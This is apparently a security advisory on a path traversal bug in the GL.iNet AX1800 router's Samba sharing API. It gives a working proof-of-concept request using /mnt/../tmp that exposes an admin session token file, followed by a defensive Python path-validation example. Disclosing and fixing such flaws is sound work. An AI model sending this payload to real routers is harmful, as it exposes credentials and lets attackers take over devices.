Affected Product
GL.iNet AX1800
Path Traversal
Through the file sharing feature, it is possible to share an arbitrary directory. The current check, which verifies that the starting directory is /mnt/, can be bypassed with ../ sequences: specifying /mnt/../tmp as the directory still shares the /tmp directory.
We also prepared a video PoC.
Proof of Concept:
Request
POST /cgi-bin/api/files/samba/set HTTP/1.1
Host: 192.168.8.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Authorization: 592e4f05283346008452c8c8ca8edf95
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Referer: http://192.168.8.1/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: Admin-Token=592e4f05283346008452c8c8ca8edf95
Connection: close
Content-Length: 62

path=/mnt/../tmp&lan_share=true&wan_share=falase&writable=true
On the shell
//192.168.8.1/GL-Samba
gl_token_592e4f05283346008452c8c8ca8edf95 N 2972 Jul 29 08:43 2023
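
The /mnt/ check described above fails because it inspects the submitted string rather than the directory it resolves to. The following is an added example, not GL.iNet firmware code and not part of the original advisory: naive_check is an assumed reconstruction of a prefix-only test, and hardened_check, SHARE_ROOT and the sample paths are hypothetical names and constructed inputs. It goes one step beyond the ../ case on the page by also rejecting a symlink that leaves the share root.

```python
import os
import tempfile

SHARE_ROOT = "/mnt"  # share root named in the advisory


def naive_check(path, root=SHARE_ROOT):
    """Assumed shape of the bypassed check: string prefix only."""
    return path.startswith(root.rstrip("/") + "/")


def hardened_check(path, root=SHARE_ROOT):
    """Resolve '..' and symlinks, then compare whole path components."""
    if "\x00" in path or not os.path.isabs(path):
        return False
    real_root = os.path.realpath(root)
    real_path = os.path.realpath(path)
    # commonpath compares components, so /mnt2 is not treated as inside /mnt
    return os.path.commonpath([real_root, real_path]) == real_root


def demo():
    """Run both checks over constructed paths under a throwaway share root."""
    root = os.path.realpath(tempfile.mkdtemp(prefix="share_root_"))
    secret = tempfile.mkdtemp(prefix="outside_")
    os.mkdir(os.path.join(root, "usb"))
    os.symlink(secret, os.path.join(root, "link"))  # symlink leaving the root
    samples = {
        "inside": os.path.join(root, "usb"),
        "dotdot": root + "/../" + os.path.basename(secret),
        "symlink": os.path.join(root, "link"),
        "sibling": root + "2/data",
    }
    return {name: (naive_check(p, root), hardened_check(p, root))
            for name, p in samples.items()}


if __name__ == "__main__":
    print("advisory path:", naive_check("/mnt/../tmp"), hardened_check("/mnt/../tmp"))
    for name, (naive, hardened) in demo().items():
        print(f"{name:8} naive={naive} hardened={hardened}")
```

Write the resolved path, not the submitted string, into the share configuration so that the value that was checked is the value that is used.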